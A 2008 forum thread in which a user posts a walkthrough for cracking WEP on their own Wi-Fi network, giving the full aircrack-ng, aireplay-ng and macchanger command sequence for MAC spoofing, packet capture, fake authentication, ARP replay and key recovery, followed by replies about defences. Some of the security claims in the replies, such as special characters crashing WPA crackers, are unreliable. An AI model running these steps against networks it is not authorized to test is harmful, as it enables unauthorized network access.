Jump to content


Check out our Community Blogs

Register and join over 40,000 other developers!


Recent Status Updates

View All Updates

Photo
- - - - -

Cracking your own WEP Network to test security

authentication

  • Please log in to reply
27 replies to this topic

#1 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 04 November 2008 - 05:33 PM

This is a short tutorial showing you how to secure your own WEP network. First let me say, the only 100% sure way to secure your wireless network, is to disable wireless, but if you use it, then you cant.

What is WEP?
Wired Equivalent Privacy (WEP) is a security protocol for wireless networks that encrypts transmitted data . It's easy to configure. Without any security your data can be intercepted without difficulty.
Please do not confuse this with WPA, WPA is Wi-Fi Protected Access, a security standard for wireless networks. This requires a password, NOT a key.

1) Can you even do it?
First we need to be sure your wireless card can support packet injection. I used my Acer Aspire 5920. It comes with a 802. 11a/b/g WLAN Wireless card. It cant do packet injection. Thus I purchased the Hawking HWUG1 Wireless card. Hard to come by, but one of the best out there. Best buy has them for $40, give or take.

2) Install the software
Some people like to use BackTrack Live OS, which to me, is pointless, unless you dont want to install linux and use it as your everyday running operating system. You need 2 things to do this, macchanger, and aircrack-ng

Commands:
Make yourself the root user:
[QUOTE]sudo -s[/QUOTE]
Install Aircrack
[QUOTE]apt-get install aircrack-ng[/QUOTE]
Install macchanger
[QUOTE]apt-get install macchanger[/QUOTE]
There! You have the 2 programs that make it easy to continue.

3) Verify you can use injection
Open the terminal, and type iwconfig. It will show you your network cards.
Posted Image
You will see I have 2 wireless cards. wlan0 and rausb0, wlan0 is what wont work, so we need to disable that, rausb0 is the wireless card I purchased.
Type the following command:
[QUOTE]aireplay-ng --test rausb0[/QUOTE]
That will show the following result.
Posted Image
If it doesnt, you need to get a wireless card that works.

4) Spoof mac and put your wireless card into monitor mode
I will list the commands, and what they do. You dont NEED to spoof your mac, but it sure makes it a lot easier to remember.

We dont need wlan0, so lets disable it.
[QUOTE]ifconfig wlan0 down[/QUOTE]
We need to disable rausb0 as well, so we can modify it
[QUOTE]ifconfig rausb0 down[/QUOTE]
Change your mac (can be whatever you want as long as it looks like ##:##:##:##:##:##)
[QUOTE]macchanger --mac 00:11:22:33:44:55 rausb0[/QUOTE]
The below commands are used for the hawking wireless card only, I believe they enable the drivers for the wireless card
[QUOTE]modprobe -r rt73
modprobe rt73[/QUOTE]
Bring up rausb0 for use
[QUOTE]ifconfig rausb0 up[/QUOTE]
Modify the bit rate of rausb0 to 1Mb/s
[QUOTE]iwconfig rausb0 rate 1M[/QUOTE]
confirm the bit rate
[QUOTE]iwconfig rausb0[/QUOTE]
Enable rausb0 for use
[QUOTE]airmon-ng start rausb0[/QUOTE]
Here is a screenshot of me doing all of that (dont mind the typo)
Posted Image
You are now ready to begin!

5) Monitor the wireless networks around you, choose your target
Type the following command into your terminal
[QUOTE]airodump-ng rausb0[/QUOTE]
This will monitor the wireless networks around you, as well as the stations connected to them.
Posted Image
You will notice the command will display pretty much everything you need. We will attack 2WIRE (my wireless lan). Notice its WEP, and its on channel 6. I have highlighted the BSSID.
NOTE: Looking at the screenshot, you will notice it shows the stations connected to BSSID's, this is why mac filtering is pointless, if they can connect, and you cant, spoof your mac to theres, and chances are it will let you in. If the station's connected BSSID is blank, that means hes looking or trying to connect to a BSSID, but has not yet.

6) Run Airodump-ng
Once you have selected your target, you can monitor the data packets it is sending out.
Type the below command into the terminal.
[QUOTE]airodump-ng -c 6 -w 2wire --bssid 00:12:88:FE:7A:21 rausb0[/QUOTE]
-c will specify the channel the BSSID is on, 2WIRE is on 6
-w will write the packet data to a file, I chose to name the file 2wire
--bssid will specify the BSSID you are trying to connect to.
NOTE: LEAVE THIS RUNNING! Open a new terminal tab, and sudo -s again as admin
Posted Image
Notice how the Data column says 0? It will climb to 5000 to 10000 packets, if you cant even hit 5000, then your signal isnt good enough. This may take time, it can take anywhere from 2 minutes to 30 minutes. Be patient.

7) Fake Authentication with Access Point
Type the below command in the terminal
[QUOTE]aireplay-ng -1 0 -a 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0[/QUOTE]
-a forces attack mode
-h is the host, that is your mac
Posted Image
The authentication must read successful in order for you to continue, I have had to run this command a few times to get it to be successful.

8) Run Aireplay with -3 (start aireplay-ng in ARP Request Replay Mode)

Type the below command into the terminal:
[QUOTE]aireplay-ng -3 -b 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0[/QUOTE]
NOTE: Open a new tab again! Let this run as well!!
Posted Image

9) LAST STEP! Decrypt the packet data
if you go into the terminal and type "ls /home", you will see some .cap files, i named my log 2wire, thus it will be "2wire-01.cap"
Type the following command into the terminal:
[QUOTE]aircrack-ng -n 64 --bssid 00:12:88:FE:7A:21 2wire-01.cap[/QUOTE]
Hope it has enough data to decrypt, if not, it will say please wait and try later.
Posted Image

SUCCESS!
  • 2

#2 Zapper

Zapper

    CC Newcomer

  • Just Joined
  • PipPip
  • 12 posts

Posted 04 November 2008 - 06:24 PM

Interesting, +rep, I will try this later.
  • 0

#3 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 04 November 2008 - 06:38 PM

thanks!
  • 0

#4 Guest_Jordan_*

Guest_Jordan_*
  • Guest

Posted 05 November 2008 - 06:57 AM

Excellent tutorial phpforfun, +rep.

What do you recommend for making your wireless network more secure?
  • 0

#5 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 05 November 2008 - 11:54 AM

Excellent tutorial phpforfun, +rep.

What do you recommend for making your wireless network more secure?


Great question, I should have posted that in the main post.

WPA, alpha numeric with a special character in it. The only program I know that can be used to crack WPA/WPA2 passwords, will crash if it has a special char put in the passwords list. :)
  • 0

#6 Xav

Xav

    CC Mentor

  • VIP Member
  • PipPipPipPipPipPipPipPip
  • 8356 posts

Posted 05 November 2008 - 12:00 PM

It depends on what you consider to be a special character. I consider the character "X" to be special, for instance.
  • 0
If you enjoy reading this discussion and are thinking about commenting, why not click here to register and start participating in under a minute?

#7 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 05 November 2008 - 12:20 PM

It depends on what you consider to be a special character. I consider the character "X" to be special, for instance.


Glossary

Special Character . . . . . . . . .
A non-numeric character not in the a-z alphabet. Common examples include ~!@#$%^&* ()_+=-`';/.,?><:"|}{\ In the context of the required Special Character for Complex Passwords, it is recommended that you do not use: @, %, ^, &, {, ~, <, or punctuation marks (such as: !, ? , ., :, ;, ' ,", ,. )


You would be wrong.
  • 0

#8 Xav

Xav

    CC Mentor

  • VIP Member
  • PipPipPipPipPipPipPipPip
  • 8356 posts

Posted 05 November 2008 - 12:32 PM

I don't care what albany.edu says. I still consider the "X" character to be rather special.
  • 0
If you enjoy reading this discussion and are thinking about commenting, why not click here to register and start participating in under a minute?

#9 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 05 November 2008 - 03:46 PM

Some people would say the same about you. ;)
  • 0

#10 Guest_Jordan_*

Guest_Jordan_*
  • Guest

Posted 05 November 2008 - 06:16 PM

And why is X special to you?

Posted via CodeCall Mobile
  • 0

#11 TkTech

TkTech

    The Crazy One

  • Retired Mod
  • PipPipPipPipPipPipPip
  • 1144 posts
  • Location:Ottawa, Ontario

Posted 05 November 2008 - 07:20 PM

Actually, WPA is almost the exact same as WEP. It was a hasty patch to known sidechannels in WEP. WPA2 is a complete rewrite and usually safe.

WEP Enterprise with a RADIUS server with a custom MAC hash algorithm FTW.
  • 0
Helpful CODECALL Links: Join Us, Guidelines, FAQ, Post a Tutorial

#12 phpforfun

phpforfun

    Speaks fluent binary

  • Expert Member
  • PipPipPipPipPipPipPip
  • 1056 posts

Posted 05 November 2008 - 11:36 PM

wpa/wpa2 and wep are 100% different to crack.

wep is a key, wpa is a password
  • 0





Also tagged with one or more of these keywords: authentication

Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download